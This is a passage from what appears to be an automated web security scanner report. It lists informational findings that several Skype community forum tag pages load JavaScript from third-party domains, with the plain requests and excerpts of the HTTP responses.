Date: Sun, 04 Sep 2011 21:46:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 129606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Sound"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.295. http://community.skype.com/t5/tag/Video/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/Video/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/Video/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Video"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.296. http://community.skype.com/t5/tag/audio/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/audio/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/audio/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "audio"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.297. http://community.skype.com/t5/tag/call/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/call/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/call/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "call"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.298. http://community.skype.com/t5/tag/contacts/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/contacts/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/contacts/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:39 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "contac
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.299. http://community.skype.com/t5/tag/english/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/english/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/english/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:26 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "englis
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.300. http://community.skype.com/t5/tag/error/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/error/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/error/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "error"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.301. http://community.skype.com/t5/tag/help/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/help/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/help/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "help"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.302. http://community.skype.com/t5/tag/history/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/history/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/history/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "histor
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.303. http://community.skype.com/t5/tag/language/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/language/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/language/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "langua
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.304. http://community.skype.com/t5/tag/login/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/login/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/login/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 133012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "login"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.305. http://community.skype.com/t5/tag/problem/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/problem/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/problem/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 129932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "proble
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.306. http://community.skype.com/t5/tag/refund/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/refund/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/refund/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "refund
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.307. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/spanish/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:43 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "spanis
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.308. http://community.skype.com/t5/tag/subscriptions/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/subscriptions/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/subscriptions/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 132464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "subscr
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.309. http://community.skype.com/t5/tag/update/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/update/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/update/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:52 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "update
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.310. http://community.skype.com/t5/tag/voicemail/tg-p/category-id/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/tag/voicemail/tg-p/category-id/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/tag/voicemail/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 128728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "voicem
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/44623F69B7A8C86AE1A3D4CFE8570062/lia-scripts-body-min.js"></script>
...[SNIP]...

18.311. http://community.skype.com/t5/user/viewprofilepage/user-id/1164  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/1164

Issue detail

